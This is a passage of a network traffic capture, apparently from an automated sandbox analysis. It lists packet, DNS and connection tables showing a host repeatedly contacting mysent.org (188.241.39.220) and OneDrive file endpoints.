Jun 19, 2018 13:46:39.259036064 MESZ	49204	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:39.259059906 MESZ	443	49204	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:39.475239038 MESZ	443	49204	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:39.487437963 MESZ	49204	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:39.487462044 MESZ	443	49204	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:39.487678051 MESZ	49204	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:39.487694025 MESZ	443	49204	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:47.616647959 MESZ	49917	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:46:47.698790073 MESZ	53	49917	8.8.8.8	192.168.1.81
Jun 19, 2018 13:46:47.711126089 MESZ	49841	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:46:47.840707064 MESZ	53	49841	8.8.8.8	192.168.1.81
Jun 19, 2018 13:46:47.841932058 MESZ	49216	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:47.841979027 MESZ	443	49216	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:47.842091084 MESZ	49216	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:47.845283031 MESZ	49216	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:47.845313072 MESZ	443	49216	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:48.023622036 MESZ	443	49216	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:48.023648977 MESZ	443	49216	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:48.023766041 MESZ	49216	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:48.025906086 MESZ	49216	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:48.025940895 MESZ	443	49216	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:48.026849031 MESZ	443	49216	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:48.227005959 MESZ	443	49216	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:48.227164030 MESZ	49216	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:48.507365942 MESZ	49216	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:48.546998024 MESZ	443	49216	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:48.683419943 MESZ	443	49216	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:48.751750946 MESZ	443	49216	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:48.751792908 MESZ	443	49216	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:48.751820087 MESZ	443	49216	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:48.751833916 MESZ	443	49216	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:48.751864910 MESZ	49216	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:48.751892090 MESZ	443	49216	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:48.752069950 MESZ	49216	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:48.752089024 MESZ	443	49216	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:48.753477097 MESZ	49216	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:48.753494978 MESZ	443	49216	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:48.753623009 MESZ	49216	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:48.753649950 MESZ	443	49216	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:48.753686905 MESZ	443	49216	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:48.753741980 MESZ	49216	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:49.052046061 MESZ	53667	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:46:49.136773109 MESZ	53	53667	8.8.8.8	192.168.1.81
Jun 19, 2018 13:46:49.173670053 MESZ	49218	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:49.173763037 MESZ	443	49218	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:49.173868895 MESZ	49218	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:49.184937954 MESZ	49218	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:49.185034990 MESZ	443	49218	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:49.356599092 MESZ	443	49218	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:49.356630087 MESZ	443	49218	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:49.356821060 MESZ	49218	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:49.366538048 MESZ	49218	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:49.366606951 MESZ	443	49218	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:49.367433071 MESZ	443	49218	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:49.367556095 MESZ	49218	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:49.594789982 MESZ	49218	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:49.631006002 MESZ	443	49218	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:49.698421001 MESZ	443	49218	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:49.698839903 MESZ	49218	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:49.698864937 MESZ	443	49218	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:49.698966026 MESZ	49218	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:49.740139008 MESZ	443	49218	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:49.740156889 MESZ	443	49218	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:49.740166903 MESZ	443	49218	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:49.740175009 MESZ	443	49218	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:49.740237951 MESZ	49218	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:49.740257978 MESZ	443	49218	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:49.740530014 MESZ	49218	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:49.740813971 MESZ	49218	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:49.740879059 MESZ	49218	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:52.293014050 MESZ	49204	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:52.293200016 MESZ	443	49204	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:52.293281078 MESZ	49204	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:52.432018995 MESZ	51748	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:46:52.519706011 MESZ	53	51748	8.8.8.8	192.168.1.81
Jun 19, 2018 13:46:52.531379938 MESZ	49223	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:52.531419992 MESZ	443	49223	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:52.531975031 MESZ	49223	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:52.533010960 MESZ	49223	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:52.533035994 MESZ	443	49223	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:52.616559982 MESZ	53199	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:46:52.700432062 MESZ	53	53199	8.8.8.8	192.168.1.81
Jun 19, 2018 13:46:52.725503922 MESZ	443	49223	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:52.741327047 MESZ	49223	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:52.741352081 MESZ	443	49223	188.241.39.220	192.168.1.81
Jun 19, 2018 13:47:05.131961107 MESZ	443	49223	188.241.39.220	192.168.1.81
Jun 19, 2018 13:47:05.132113934 MESZ	443	49223	188.241.39.220	192.168.1.81
Jun 19, 2018 13:47:05.132673025 MESZ	49223	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:47:05.132695913 MESZ	443	49223	188.241.39.220	192.168.1.81
Jun 19, 2018 13:47:05.165354013 MESZ	49223	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:47:07.068852901 MESZ	49240	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:47:07.068929911 MESZ	443	49240	188.241.39.220	192.168.1.81
Jun 19, 2018 13:47:07.069016933 MESZ	49240	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:47:07.070158958 MESZ	49240	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:47:07.070188046 MESZ	443	49240	188.241.39.220	192.168.1.81
Jun 19, 2018 13:47:07.236735106 MESZ	443	49240	188.241.39.220	192.168.1.81
Jun 19, 2018 13:47:07.251287937 MESZ	49240	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:47:07.251327038 MESZ	443	49240	188.241.39.220	192.168.1.81
Jun 19, 2018 13:47:07.251593113 MESZ	49240	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:47:07.251611948 MESZ	443	49240	188.241.39.220	192.168.1.81
Jun 19, 2018 13:47:13.057761908 MESZ	54134	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:47:13.072623014 MESZ	59582	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:47:13.143685102 MESZ	53	54134	8.8.8.8	192.168.1.81
Jun 19, 2018 13:47:13.150593042 MESZ	49242	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:47:13.150631905 MESZ	443	49242	188.241.39.220	192.168.1.81
Jun 19, 2018 13:47:13.150752068 MESZ	49242	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:47:13.154094934 MESZ	49242	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:47:13.154122114 MESZ	443	49242	188.241.39.220	192.168.1.81
Jun 19, 2018 13:47:13.187793016 MESZ	53	59582	8.8.8.8	192.168.1.81
Jun 19, 2018 13:47:13.194593906 MESZ	49243	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:47:13.194631100 MESZ	443	49243	188.241.39.220	192.168.1.81
Jun 19, 2018 13:47:13.194705963 MESZ	49243	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:47:13.197081089 MESZ	49243	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:47:13.197113037 MESZ	443	49243	188.241.39.220	192.168.1.81
Jun 19, 2018 13:47:13.360052109 MESZ	443	49242	188.241.39.220	192.168.1.81
Jun 19, 2018 13:47:13.360089064 MESZ	443	49242	188.241.39.220	192.168.1.81
Jun 19, 2018 13:47:13.360366106 MESZ	49242	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:47:13.361464024 MESZ	49242	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:47:13.361525059 MESZ	443	49242	188.241.39.220	192.168.1.81
Jun 19, 2018 13:47:13.362406015 MESZ	443	49242	188.241.39.220	192.168.1.81
Jun 19, 2018 13:47:13.397340059 MESZ	443	49243	188.241.39.220	192.168.1.81
Jun 19, 2018 13:47:13.397366047 MESZ	443	49243	188.241.39.220	192.168.1.81
Jun 19, 2018 13:47:13.397469044 MESZ	49243	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:47:13.398267984 MESZ	49243	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:47:13.398292065 MESZ	443	49243	188.241.39.220	192.168.1.81
Jun 19, 2018 13:47:13.398825884 MESZ	443	49243	188.241.39.220	192.168.1.81
Jun 19, 2018 13:47:13.563024044 MESZ	443	49242	188.241.39.220	192.168.1.81
Jun 19, 2018 13:47:13.565690994 MESZ	49242	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:47:13.567151070 MESZ	49242	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:47:13.597517014 MESZ	49243	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:47:13.984443903 MESZ	49242	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:47:14.023010969 MESZ	443	49242	188.241.39.220	192.168.1.81
Jun 19, 2018 13:47:14.026889086 MESZ	49243	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:47:14.063000917 MESZ	443	49243	188.241.39.220	192.168.1.81
Jun 19, 2018 13:47:17.263454914 MESZ	443	49243	188.241.39.220	192.168.1.81
Jun 19, 2018 13:47:17.285099030 MESZ	443	49243	188.241.39.220	192.168.1.81
Jun 19, 2018 13:47:17.285119057 MESZ	443	49243	188.241.39.220	192.168.1.81
Jun 19, 2018 13:47:17.285131931 MESZ	443	49243	188.241.39.220	192.168.1.81
Jun 19, 2018 13:47:17.285140038 MESZ	443	49243	188.241.39.220	192.168.1.81
Jun 19, 2018 13:47:17.285254002 MESZ	49243	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:47:17.285286903 MESZ	443	49243	188.241.39.220	192.168.1.81
Jun 19, 2018 13:47:17.287344933 MESZ	49243	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:47:19.656801939 MESZ	62941	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:47:19.735133886 MESZ	53	62941	8.8.8.8	192.168.1.81
Jun 19, 2018 13:47:19.737128973 MESZ	53271	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:47:19.818101883 MESZ	53	53271	8.8.8.8	192.168.1.81
Jun 19, 2018 13:47:20.307322979 MESZ	49168	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:47:20.388645887 MESZ	53	49168	8.8.8.8	192.168.1.81
Jun 19, 2018 13:47:20.391122103 MESZ	63129	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:47:20.417556047 MESZ	49245	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:47:20.417597055 MESZ	443	49245	188.241.39.220	192.168.1.81
Jun 19, 2018 13:47:20.417687893 MESZ	49245	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:47:20.418303013 MESZ	49245	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:47:20.418327093 MESZ	443	49245	188.241.39.220	192.168.1.81
Jun 19, 2018 13:47:20.478429079 MESZ	53	63129	8.8.8.8	192.168.1.81
Jun 19, 2018 13:47:20.655116081 MESZ	443	49240	188.241.39.220	192.168.1.81
Jun 19, 2018 13:47:20.655658007 MESZ	443	49245	188.241.39.220	192.168.1.81
Jun 19, 2018 13:47:20.671679974 MESZ	49245	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:47:20.671705008 MESZ	443	49245	188.241.39.220	192.168.1.81
Jun 19, 2018 13:47:20.671828985 MESZ	49245	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:47:20.671844959 MESZ	443	49245	188.241.39.220	192.168.1.81
Jun 19, 2018 13:47:20.847259045 MESZ	49240	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:47:20.847296000 MESZ	443	49240	188.241.39.220	192.168.1.81
Jun 19, 2018 13:47:20.848299980 MESZ	49240	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:47:20.884407043 MESZ	49247	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:47:20.884460926 MESZ	443	49247	188.241.39.220	192.168.1.81
Jun 19, 2018 13:47:20.884543896 MESZ	49247	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:47:20.884727001 MESZ	443	49242	188.241.39.220	192.168.1.81
Jun 19, 2018 13:47:20.884819984 MESZ	49247	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:47:20.884840012 MESZ	443	49247	188.241.39.220	192.168.1.81
Jun 19, 2018 13:47:20.906543970 MESZ	443	49242	188.241.39.220	192.168.1.81
Jun 19, 2018 13:47:20.906563044 MESZ	443	49242	188.241.39.220	192.168.1.81
Jun 19, 2018 13:47:20.906574011 MESZ	443	49242	188.241.39.220	192.168.1.81
Jun 19, 2018 13:47:20.906586885 MESZ	443	49242	188.241.39.220	192.168.1.81
Jun 19, 2018 13:47:20.906702995 MESZ	49242	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:47:20.906723976 MESZ	443	49242	188.241.39.220	192.168.1.81
Jun 19, 2018 13:47:20.907846928 MESZ	49242	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:47:21.174601078 MESZ	443	49247	188.241.39.220	192.168.1.81
Jun 19, 2018 13:47:21.178117990 MESZ	49247	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:47:21.178138018 MESZ	443	49247	188.241.39.220	192.168.1.81
Jun 19, 2018 13:47:26.001002073 MESZ	49248	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:47:26.001044989 MESZ	443	49248	188.241.39.220	192.168.1.81
Jun 19, 2018 13:47:26.001126051 MESZ	49248	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:47:26.001548052 MESZ	49248	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:47:26.001568079 MESZ	443	49248	188.241.39.220	192.168.1.81
Jun 19, 2018 13:47:26.423341990 MESZ	443	49248	188.241.39.220	192.168.1.81
Jun 19, 2018 13:47:26.428590059 MESZ	49248	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:47:26.428611994 MESZ	443	49248	188.241.39.220	192.168.1.81
Jun 19, 2018 13:47:26.428754091 MESZ	49248	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:47:26.428774118 MESZ	443	49248	188.241.39.220	192.168.1.81
Jun 19, 2018 13:47:34.113055944 MESZ	443	49247	188.241.39.220	192.168.1.81
Jun 19, 2018 13:47:34.113208055 MESZ	443	49247	188.241.39.220	192.168.1.81
Jun 19, 2018 13:47:34.113539934 MESZ	49247	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:47:34.113562107 MESZ	443	49247	188.241.39.220	192.168.1.81
Jun 19, 2018 13:47:34.114550114 MESZ	49247	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:47:36.477251053 MESZ	443	49245	188.241.39.220	192.168.1.81

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 19, 2018 13:45:25.876578093 MESZ	63700	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:45:25.995949984 MESZ	53	63700	8.8.8.8	192.168.1.81
Jun 19, 2018 13:45:26.007379055 MESZ	54244	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:45:26.118120909 MESZ	53	54244	8.8.8.8	192.168.1.81
Jun 19, 2018 13:45:28.013514042 MESZ	60413	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:45:28.111138105 MESZ	53	60413	8.8.8.8	192.168.1.81
Jun 19, 2018 13:45:28.557406902 MESZ	49912	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:45:28.939400911 MESZ	53	49912	8.8.8.8	192.168.1.81
Jun 19, 2018 13:45:30.818237066 MESZ	62993	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:45:31.816508055 MESZ	62993	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:45:32.816221952 MESZ	62993	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:45:34.816581011 MESZ	62993	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:45:36.043857098 MESZ	53	62993	8.8.8.8	192.168.1.81
Jun 19, 2018 13:45:36.067980051 MESZ	53	62993	8.8.8.8	192.168.1.81
Jun 19, 2018 13:45:36.068027973 MESZ	53	62993	8.8.8.8	192.168.1.81
Jun 19, 2018 13:45:36.068063021 MESZ	53	62993	8.8.8.8	192.168.1.81
Jun 19, 2018 13:45:38.880671024 MESZ	58780	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:45:39.077951908 MESZ	53	58780	8.8.8.8	192.168.1.81
Jun 19, 2018 13:45:42.684019089 MESZ	54934	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:45:42.930069923 MESZ	53	54934	8.8.8.8	192.168.1.81
Jun 19, 2018 13:45:46.172106981 MESZ	62845	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:45:46.252887011 MESZ	53	62845	8.8.8.8	192.168.1.81
Jun 19, 2018 13:45:58.625226974 MESZ	57200	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:45:58.789825916 MESZ	53	57200	8.8.8.8	192.168.1.81
Jun 19, 2018 13:45:58.794080973 MESZ	53499	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:45:58.888606071 MESZ	53	53499	8.8.8.8	192.168.1.81
Jun 19, 2018 13:45:59.298362017 MESZ	62060	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:45:59.410604954 MESZ	53	62060	8.8.8.8	192.168.1.81
Jun 19, 2018 13:45:59.415369034 MESZ	51380	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:45:59.552336931 MESZ	53	51380	8.8.8.8	192.168.1.81
Jun 19, 2018 13:46:28.178056955 MESZ	55175	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:46:28.278707027 MESZ	53	55175	8.8.8.8	192.168.1.81
Jun 19, 2018 13:46:28.294118881 MESZ	65476	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:46:28.386775970 MESZ	53	65476	8.8.8.8	192.168.1.81
Jun 19, 2018 13:46:38.305830002 MESZ	52882	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:46:38.424603939 MESZ	53	52882	8.8.8.8	192.168.1.81
Jun 19, 2018 13:46:39.030488968 MESZ	49433	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:46:39.256655931 MESZ	53	49433	8.8.8.8	192.168.1.81
Jun 19, 2018 13:46:47.616647959 MESZ	49917	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:46:47.698790073 MESZ	53	49917	8.8.8.8	192.168.1.81
Jun 19, 2018 13:46:47.711126089 MESZ	49841	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:46:47.840707064 MESZ	53	49841	8.8.8.8	192.168.1.81
Jun 19, 2018 13:46:49.052046061 MESZ	53667	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:46:49.136773109 MESZ	53	53667	8.8.8.8	192.168.1.81
Jun 19, 2018 13:46:52.432018995 MESZ	51748	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:46:52.519706011 MESZ	53	51748	8.8.8.8	192.168.1.81
Jun 19, 2018 13:46:52.616559982 MESZ	53199	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:46:52.700432062 MESZ	53	53199	8.8.8.8	192.168.1.81
Jun 19, 2018 13:47:13.057761908 MESZ	54134	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:47:13.072623014 MESZ	59582	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:47:13.143685102 MESZ	53	54134	8.8.8.8	192.168.1.81
Jun 19, 2018 13:47:13.187793016 MESZ	53	59582	8.8.8.8	192.168.1.81
Jun 19, 2018 13:47:19.656801939 MESZ	62941	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:47:19.735133886 MESZ	53	62941	8.8.8.8	192.168.1.81
Jun 19, 2018 13:47:19.737128973 MESZ	53271	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:47:19.818101883 MESZ	53	53271	8.8.8.8	192.168.1.81
Jun 19, 2018 13:47:20.307322979 MESZ	49168	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:47:20.388645887 MESZ	53	49168	8.8.8.8	192.168.1.81
Jun 19, 2018 13:47:20.391122103 MESZ	63129	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:47:20.478429079 MESZ	53	63129	8.8.8.8	192.168.1.81

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Jun 19, 2018 13:45:36.068113089 MESZ	192.168.1.81	8.8.8.8	cf51	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jun 19, 2018 13:45:25.876578093 MESZ	192.168.1.81	8.8.8.8	0xc5b6	Standard query (0)	mysent.org	A (IP address)	IN (0x0001)
Jun 19, 2018 13:45:26.007379055 MESZ	192.168.1.81	8.8.8.8	0xadd9	Standard query (0)	mysent.org	A (IP address)	IN (0x0001)
Jun 19, 2018 13:45:28.013514042 MESZ	192.168.1.81	8.8.8.8	0xcad6	Standard query (0)	mysent.org	A (IP address)	IN (0x0001)
Jun 19, 2018 13:45:30.818237066 MESZ	192.168.1.81	8.8.8.8	0x23fe	Standard query (0)	api.onedrive.com	A (IP address)	IN (0x0001)
Jun 19, 2018 13:45:31.816508055 MESZ	192.168.1.81	8.8.8.8	0x23fe	Standard query (0)	api.onedrive.com	A (IP address)	IN (0x0001)
Jun 19, 2018 13:45:32.816221952 MESZ	192.168.1.81	8.8.8.8	0x23fe	Standard query (0)	api.onedrive.com	A (IP address)	IN (0x0001)
Jun 19, 2018 13:45:34.816581011 MESZ	192.168.1.81	8.8.8.8	0x23fe	Standard query (0)	api.onedrive.com	A (IP address)	IN (0x0001)
Jun 19, 2018 13:45:38.880671024 MESZ	192.168.1.81	8.8.8.8	0xba3c	Standard query (0)	dgdadq.dm.files.1drv.com	A (IP address)	IN (0x0001)
Jun 19, 2018 13:45:46.172106981 MESZ	192.168.1.81	8.8.8.8	0xada9	Standard query (0)	mysent.org	A (IP address)	IN (0x0001)
Jun 19, 2018 13:46:39.030488968 MESZ	192.168.1.81	8.8.8.8	0x37c1	Standard query (0)	mysent.org	A (IP address)	IN (0x0001)
Jun 19, 2018 13:46:47.616647959 MESZ	192.168.1.81	8.8.8.8	0x1582	Standard query (0)	mysent.org	A (IP address)	IN (0x0001)
Jun 19, 2018 13:46:47.711126089 MESZ	192.168.1.81	8.8.8.8	0xc8ec	Standard query (0)	mysent.org	A (IP address)	IN (0x0001)
Jun 19, 2018 13:46:49.052046061 MESZ	192.168.1.81	8.8.8.8	0xae8	Standard query (0)	mysent.org	A (IP address)	IN (0x0001)
Jun 19, 2018 13:46:52.432018995 MESZ	192.168.1.81	8.8.8.8	0x1c7e	Standard query (0)	mysent.org	A (IP address)	IN (0x0001)
Jun 19, 2018 13:47:13.057761908 MESZ	192.168.1.81	8.8.8.8	0x6efd	Standard query (0)	mysent.org	A (IP address)	IN (0x0001)
Jun 19, 2018 13:47:13.072623014 MESZ	192.168.1.81	8.8.8.8	0x42d2	Standard query (0)	mysent.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Replay Code	Name	Address	Type	Class
Jun 19, 2018 13:45:25.995949984 MESZ	8.8.8.8	192.168.1.81	0xc5b6	No error (0)	mysent.org	188.241.39.220	A (IP address)	IN (0x0001)
Jun 19, 2018 13:45:26.118120909 MESZ	8.8.8.8	192.168.1.81	0xadd9	No error (0)	mysent.org	188.241.39.220	A (IP address)	IN (0x0001)
Jun 19, 2018 13:45:28.111138105 MESZ	8.8.8.8	192.168.1.81	0xcad6	No error (0)	mysent.org	188.241.39.220	A (IP address)	IN (0x0001)
Jun 19, 2018 13:45:36.043857098 MESZ	8.8.8.8	192.168.1.81	0x23fe	No error (0)	api.onedrive.com	204.79.197.213	A (IP address)	IN (0x0001)
Jun 19, 2018 13:45:36.067980051 MESZ	8.8.8.8	192.168.1.81	0x23fe	No error (0)	api.onedrive.com	204.79.197.213	A (IP address)	IN (0x0001)
Jun 19, 2018 13:45:36.068027973 MESZ	8.8.8.8	192.168.1.81	0x23fe	No error (0)	api.onedrive.com	204.79.197.213	A (IP address)	IN (0x0001)
Jun 19, 2018 13:45:36.068063021 MESZ	8.8.8.8	192.168.1.81	0x23fe	No error (0)	api.onedrive.com	204.79.197.213	A (IP address)	IN (0x0001)
Jun 19, 2018 13:45:39.077951908 MESZ	8.8.8.8	192.168.1.81	0xba3c	No error (0)	dgdadq.dm.files.1drv.com	131.253.33.213	A (IP address)	IN (0x0001)
Jun 19, 2018 13:45:46.252887011 MESZ	8.8.8.8	192.168.1.81	0xada9	No error (0)	mysent.org	188.241.39.220	A (IP address)	IN (0x0001)
Jun 19, 2018 13:46:39.256655931 MESZ	8.8.8.8	192.168.1.81	0x37c1	No error (0)	mysent.org	188.241.39.220	A (IP address)	IN (0x0001)
Jun 19, 2018 13:46:47.698790073 MESZ	8.8.8.8	192.168.1.81	0x1582	No error (0)	mysent.org	188.241.39.220	A (IP address)	IN (0x0001)
Jun 19, 2018 13:46:47.840707064 MESZ	8.8.8.8	192.168.1.81	0xc8ec	No error (0)	mysent.org	188.241.39.220	A (IP address)	IN (0x0001)
Jun 19, 2018 13:46:49.136773109 MESZ	8.8.8.8	192.168.1.81	0xae8	No error (0)	mysent.org	188.241.39.220	A (IP address)	IN (0x0001)
Jun 19, 2018 13:46:52.519706011 MESZ	8.8.8.8	192.168.1.81	0x1c7e	No error (0)	mysent.org	188.241.39.220	A (IP address)	IN (0x0001)
Jun 19, 2018 13:47:13.143685102 MESZ	8.8.8.8	192.168.1.81	0x6efd	No error (0)	mysent.org	188.241.39.220	A (IP address)	IN (0x0001)
Jun 19, 2018 13:47:13.187793016 MESZ	8.8.8.8	192.168.1.81	0x42d2	No error (0)	mysent.org	188.241.39.220	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

mysent.org

api.onedrive.com

dgdadq.dm.files.1drv.com

HTTPS Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Subject	Issuer	Not Before	Not After	Raw
